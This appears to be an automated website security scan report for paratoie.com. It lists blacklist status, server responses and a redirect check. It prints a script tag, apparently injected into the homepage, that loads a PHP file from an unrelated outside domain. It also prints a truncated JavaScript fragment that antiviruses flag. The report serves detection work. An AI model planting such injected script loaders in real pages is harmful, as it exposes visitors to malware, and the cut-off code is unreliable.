Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=paratoie.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://paratoie.com/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Thu, 08 Jan 2015 09:07:08 GMT Location: http://www.paratoie.com/ Server: Apache Content-Length: 232 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.paratoie.com/ | HTTP/1.1 200 OK Date: Thu, 08 Jan 2015 09:07:09 GMT Accept-Ranges: bytes ETag: "e8d8d5c4ef3cf1:581144" Server: Microsoft-IIS/6.0 Content-Length: 4416 Content-Location: http://www.paratoie.com/index.htm Content-Type: text/html Last-Modified: Wed, 29 Oct 2014 08:00:10 GMT MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET | clean |
http://www.paratoie.com/index.htm | 200 OK Content-Length: 4416 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://linuxdaytorino.org/2011/r3pdqbkt.php?id=1838253"></script> | ||
http://codicepro.shinystat.it/cgi-bin/getcod.cgi?USER=amgimp&P=1 | 200 OK Content-Length: 4175 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) <!-- function cCk(nm,vl,mn){var ex=cdm="";var _sscdom="";if (_sscdom && _sscdom!="") { cdm=" domain="+_sscdom; if (mn) {document.cookie=nm+"=; expires=Thu, 01-Jan-70 00:00:01 GMT; path=/;";}}if (mn) {var d=new Date();d.setTime(d.getTime()+(mn*6*1000)); ex="; expires="+d.toGMTString();} document.cookie=nm+"="+vl+ex+"; path=/;"+cdm+"";} function rCk(nm){var nEQ=nm+"=";var ca=document.cookie.split(';');for(var i=0;i<ca.length;i++){var c=ca[i]; while(c.charAt(0)==' ') c=c.subst if (ssqS_.indexOf("NODW=yes")>-1){var ig_=new Image(1,1);ig_.src=ssqS_+"&RM="+Math.round(Math.random()*2147483647);ig_.onload=function(){_ssvoid();}} else{document.write("<a href=\"http://s1.shinystat.com/cgi-bin/shinystatv.cgi?USER="+us_+"&NH=1\" Target=\"_new\"><img src=\""+ssqS_+"\" border=\"0\"/></a>"); } Antivirus reports:
| ||
http://paratoie.com/test404page.js | HTTP/1.1 301 Moved Permanently Connection: close Date: Thu, 08 Jan 2015 09:07:09 GMT Location: http://www.paratoie.com/test404page.js Server: Apache Content-Length: 246 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.paratoie.com/test404page.js | 404 Not Found Content-Length: 1635 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: paratoie.com
Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Thu, 08 Jan 2015 09:07:08 GMT
Location: http://www.paratoie.com/
Server: Apache
Content-Length: 232
Content-Type: text/html; charset=iso-8859-1
...232 bytes of data.
GET / HTTP/1.1
Host: paratoie.com
Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Thu, 08 Jan 2015 09:07:08 GMT
Location: http://www.paratoie.com/
Server: Apache
Content-Length: 232
Content-Type: text/html; charset=iso-8859-1
...232 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: paratoie.com
Referer: http://www.google.com/search?q=paratoie.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: paratoie.com
Referer: http://www.google.com/search?q=paratoie.com
Result:
The result is similar to the first query. There are no suspicious redirects found.